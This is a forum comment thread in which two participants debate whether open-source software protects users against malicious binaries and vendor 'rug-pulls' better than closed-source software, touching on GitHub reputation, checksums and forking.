Comment by lutusp
1 month ago
> Open-source only matters if you have the time/skill/willingness to download said source (and any dependencies') and compile it.
Not really. The fact that an application is open-source means its originator can't rug-pull its users at some random future date (as so often happens with closed-source programs). End users don't need to compile the source for that to be true.
> Otherwise you're still running a random binary and there's no telling whether the source is malicious or whether the binary was even built with the published source.
This is also not true in general. Most open-source programs are available from an established URL, for example a Github archive with an appropriate track record. And the risks of downloading and running a closed-source app are much the same.
The kind of rug-pulling you describe only works if the software implements an online licensing check/DRM, and either way has nothing to do with security against malicious behavior.
> Github archive with an appropriate track record
How do you judge the "track record"? Github stars can be bought. Marketing can be used to inflate legitimate usage of a program before introducing the malicious behavior.
> the risks of downloading and running a closed-source app are much the same
But that's my point - open-source doesn't really change the equation there unless you are actually auditing the source and building & running said source. If you're just relying on a binary download you're no better than downloading proprietary software in binary form.
> The kind of rug-pulling you describe only works if the software implements an online licensing check/DRM, and either way has nothing to do with security against malicious behavior.
My point was that an open-source program cannot rug-pull its users without the obvious remedy of forking the project and removing the offending code. Open-source: commonly seen. Closed-source: not possible and often illegal.
For both options, you have to trust the source, which makes that a non-issue. You can checksum the Linux kernel to satisfy yourself that it came from a trusted source. You can checksum the Windows kernel to satisfy yourself that you're about to be screwed.
> But that's my point - open-source doesn't really change the equation there unless you are actually auditing the source and building & running said source.
In the open-source world, knowing how computers work is essential. In the closed-source world, knowing how computers work is somewhere between pointless and illegal. This is how open-source "changes the equation."
Modifying open-source code is welcome and accepted. Modifying closed-source code breaks the law. Take your pick.